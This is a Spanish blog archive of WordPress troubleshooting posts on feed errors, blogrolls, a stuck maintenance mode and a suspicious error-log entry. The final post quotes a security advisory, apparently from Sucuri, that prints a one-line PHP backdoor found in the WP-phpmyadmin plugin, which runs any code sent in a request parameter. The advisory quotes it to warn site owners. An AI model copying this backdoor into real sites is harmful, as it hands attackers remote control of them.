Archive for the ‘wordpress’ Category

Error de lectura XML en los feeds de un blog con WordPress.org, solucionado

problema_feed_wordpress
De repente y sin tener ni idea de por que, al pinchar en el link de los feeds del blog http://www.mur3.com/?feed=rss2, me saltaba este error. Bueno, estamos bien. Busco por la red algo similar, por que ya sabeis, siempre en internet lo que te pasa a ti ya le paso a otro, y efectivamente, tras unos minutos de quitar paja, llego a este blog en donde dan con la solucion a la primera:

Un espacio en blanco al final del archivo wp-config.php, el archivo de configuración de WordPress, ha sido probablemente el causante de que el feed de un blog no funcionara, devolviendo errores de parseado XML. El error propiamente dicho se debía a que la primera línea del código XML devuelto estaba vacía, no pudiendo intrpretar así el código correctamente.

Sabía que el error estaba ahí, pero no tenía ni idea de qué archivos debía modificar para solventar dicho fallo. Al final, tras varias búsquedas, me he encontrado con este post de ayudawordpress.com (otra vez menciono este fantástico sitio). En el veterano blog he encontrado la solución al problema, bueno, en mi caso en uno de los comentarios: eliminar líneas en blanco de ciertos archivos que tratan con los feeds, pero principalmente del wp-config.php, como ya he mencionado.

Aunque he eliminado líneas en blanco de un par de archivos más, estoy prácticamente seguro de que la sola eliminación de los espacios en blanco del archivo wp-config.php ha hecho que funcione el feed o fuente RSS del blog que mencionaba.

Y efectivamente, tras editar con el Notepad++ el archivo wp-config.php y quitar 3 espacios que tenia al final del mismo, el link de los feeds de mi blog ya funciona de nuevo correctamente.

Muchas gracias a los que se molestan en publicar soluciones a problemas raros.

Escuchando:

Se buscan blogs para agregar al BLOGROLL

Lo dicho, me gustaria agregar mas blogs al BLOGROLL que tengo en la web y que mejor que haciendo una peticion publica. Me gustaria que fueran sites de tematica similar a este, tecnologia, informatica, electronica, ocio, etc. Logicamente debe de tener un sistema de BLOGROLL para hacerlo, ya que eso motiva la publicacion diaria o con una frecuencia estable para estar arriba en el sistema.

Pues eso, interesados dejar un mensaje en esta entrada y hablamos del tema, si queries ver las estadisticas, las podeis ver al final de la columna interior.

Un saludo y animaros a mover un poco esto.

Como añadir un “blogroll” dinamico a nuestro blog de WordPress.org

Hace unos dias le envie un correo electronico al blogger STD, es decir – Servicio Tecnico Digame – para proponer un intercambio de links y poder estar en  contacto pues sus entradas son de nuestro agrado, y por lo que veo, las que escribimos por estos lares, son de su agrado tambien.
El tema es que es su mail me abrio los ojos en cuanto a intercambio de links, referencias, etc se refiere. ¿Por que? Por que ahora los links planos de texto ya no se llevan, es mucho mas eficaz, dinamico y actual el “blogroll”.

Dicho esto, ¿como podemos poner un blogroll “decente” en nuestro blog creado con WordPress.org?. Despues de unas busquedas por los plugins, no encontraba nada bello y sencillo, a la par que practico, hasta que di con este plugin – SBS Blogroll – localizado en esta entrada, la cual os invito a visitar pues esta todo muy bien explicado, las caracteristicas basicas, como configurarlo y un par de consejos.

Fuente: conocimientoabierto.es

WordPress: No disponible por mantenimiento programado. Vuelve a comprobar el sitio en unos minutos



Ayer entro para administrar el blog y veo que tengo un plug-in para actualizar, le doy, y se queda bastante rato sin hacer nada, mas de lo habitual. Le doy a F5 para recargar pagina y ver si a la segunda va, y me sale el mensaje que os muestro arriba.

Entro en www.mur3.com, y lo mismo, entro en la zona de administracion y tambien salia el mensaje, no tenia forma de acceder a la administracion de mi propio blog, me sentia inutil.

Pero San Google siempre tiene solucion a todo, y lo que yo siempre digo: cualquier problema que tengas, alguien lo ha tenido antes que tu y la solucion esta al alcance de una busqueda acertada, y asi fue.

En esta web reparaciondepc.cl me dieron la solucion que os pongo a continuacion:

– Entra con un programa FTP a los archivos de instalacion de tu WordPress, y en el raiz del sitio localiza el fichero .maintenance, borralo y tu blog volvera a la vida.

Fuente: reparaciondepc.cl

script ‘C:/AppServ/www/phpMyAdmin/upgrade.php’ encontrado en error.log

No paro de encontrar cosas curiosas examinando mi error.log del blog, la penultima es esta linea:

script ‘C:/AppServ/www/phpMyAdmin/upgrade.php’

Ejecutada por tres diferentes ip’s en menos de 2 minutos, quiza sea un intento fallido de denegacion de servicio, me estan hackeando el blog, uuuhhhhh… que miedo. Pues nada mas lejos de la realidad, por supuesto, realizo la pertinente busqueda de la cadena completa en Google y me encuentro con esto: (fuente)

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.

On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:

<?php if(isset($_REQUEST[“asc”]))eval(stripslashes($_REQUEST[“asc”])); ?>

This is not part of the plugin, and should be removed immediately!

The code snippet above is a backdoor and allows remote access to the affected sites with it installed.

We also noticed that it was removed from the WordPress plugin repository (originally here: wordpress.org/extend/plugins/wp-phpmyadmin/ ) and is no longer maintained (last update in 2007). Since it is not longer being updated, you shouldn’t be using it anymore.

EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:

The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.

So the plugin wasn’t removed because of any security issue, but because of the recent weird activity and due to the fact that it is not maintained, we recommend deleting it as soon as possible.


If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.

If you are not sure if your site got hacked, you can scan it here: http://sitecheck.sucuri.net.

 

Por suerte no estoy usando el plugin para WordPress que “ofrece” este bug, nunca esta de mas saber estas cosas. Ya sabeis, si estais usando el plugin WP-phpmyadmin, desinstalarlo, u os pueden marear un poco el blog.